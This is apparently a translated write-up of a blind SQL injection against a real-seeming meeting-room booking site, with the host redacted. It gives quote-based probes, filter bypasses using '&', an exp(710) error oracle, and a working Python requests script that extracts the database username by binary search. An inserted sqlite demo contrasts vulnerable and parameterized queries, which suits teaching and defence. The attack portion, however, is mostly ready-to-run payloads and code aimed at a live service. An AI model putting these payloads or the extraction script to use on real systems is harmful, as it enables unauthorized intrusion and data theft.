0x01 Confirming the injection
Normal request
Adding a single quote to the office parameter makes the page return an "unknown application-level error"
The query is presumably roughly as follows:
select xxx from xxx where office='wankezhongxin''
Two single quotes behave normally
The query is then roughly:
select xxx from xxx where office='wankezhongxin'''
0x02 Injection method
Since the response echoes data, I originally planned to go with a UNION query, so I first tried to comment out the rest of the statement:
wankezhongxin'#
But none of the many comment variants I tested worked
wankezhongxin'#
wankezhongxin'--+
wankezhongxin')#
wankezhongxin')--+
.....
Then I tried whether I could close the quote instead, but it still reported an error
wankezhongxin'and'1'='1
At this point I guessed that the code layer was intercepting or filtering something
Replacing and with &, or with - + * / ^ |, all work
Next, construct a true state and a false state; here exp(1) and exp(710) are used together with if. Note: exp(710) raises an error in MySQL. Here 1=1 returns success
'& if(1=1,exp(1),exp(710)) &'
1=2 returns an error
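As an added example (not code from the original post), a Python/sqlite3 stand-in for the office lookup described above: the string-concatenated query reproduces the observations from 0x01 and 0x02 (one quote errors, two quotes are fine, the '& if(...) &' string is parsed as SQL), while the parameterized query treats every probe as plain data. The table, its rows and the function names are constructed for this demo; on sqlite the last probe fails because if() does not exist there, whereas on MySQL it is the exp(710) oracle the post describes.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the meeting-room lookup behind `office`."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rooms (office TEXT, room TEXT)")
    con.executemany("INSERT INTO rooms VALUES (?, ?)",
                    [("wankezhongxin", "A-101"), ("other-office", "B-202")])
    return con


def lookup_vulnerable(con, office):
    # The value is spliced into the SQL text, so quotes and operators inside it
    # become part of the statement: ... where office='<value>'  (the shape the post infers)
    sql = "SELECT room FROM rooms WHERE office='" + office + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, office):
    # Bound parameter: the driver passes the value separately from the SQL text,
    # so a quote, an '&' or an if(...) inside it can never change the statement.
    rows = con.execute("SELECT room FROM rooms WHERE office = ?", (office,))
    return [row[0] for row in rows]


def classify(lookup, office):
    """What the caller observes: 'rows', 'empty', or 'sql_error' (the post's 'unknown error')."""
    con = make_db()
    try:
        return "rows" if lookup(con, office) else "empty"
    except sqlite3.Error:
        return "sql_error"
    finally:
        con.close()


# The probes from 0x01 / 0x02 with the expected (vulnerable, safe) observations.
PROBES = {
    "wankezhongxin": ("rows", "rows"),
    "wankezhongxin'": ("sql_error", "empty"),     # one quote: unterminated string literal
    "wankezhongxin''": ("empty", "empty"),        # two quotes: an escaped quote, valid SQL
    "'& if(1=1,exp(1),exp(710)) &'": ("sql_error", "empty"),  # parsed as SQL vs. kept as text
}


def run_probes():
    """Run every probe through both lookups and return the observed pairs."""
    return {p: (classify(lookup_vulnerable, p), classify(lookup_safe, p)) for p in PROBES}
```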
0x03 Getting the username
During testing, user(), database() and so on all errored; here the username is queried through CURRENT_USER, which is equivalent to user()
Manually testing gave a length of 21
'& if(length(CURRENT_USER)=21,exp(1),exp(710)) &'1
Write a binary-search script to extract the actual value
import requests
import time

name = ''
no = r'101'             # marker that shows up in the response when the query raised an error
for j in range(1, 22):  # the username length was measured as 21 above
    l = 32
    h = 127
    while abs(l - h) > 1:
        i = int((l + h) / 2)
        url = "https://xxxxxx.com"
        headers = {"Connection": "close", "sec-ch-ua": "\"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"", "Accept": "application/json, text/plain, */*", "empId": "20228530", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "Origin": "https://XXXXX", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "XXXXXXXX", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Content-Type": "application/json;charset=UTF-8"}
        # substr's third argument is the length; 1 is enough because ascii() only reads the first character
        burp0_json = {"city": "shanghai", "endTime": "24:00", "meetingDay": "2022-05-09", "office": "'& if(ascii(substr(CURRENT_USER," + str(j) + ",1))>" + str(i) + ",exp(1),exp(710)) &'1", "startTime": "9:00"}
        r = requests.post(url, headers=headers, json=burp0_json)
        time.sleep(0.2)
        if no not in r.text:  # no error: the character code is greater than i
            l = i
        else:                 # error from exp(710): the character code is at most i
            h = i
    name += chr(h)
    print(chr(h))
print(name)
Run result
2 comments
Impressive
Here to watch the master at work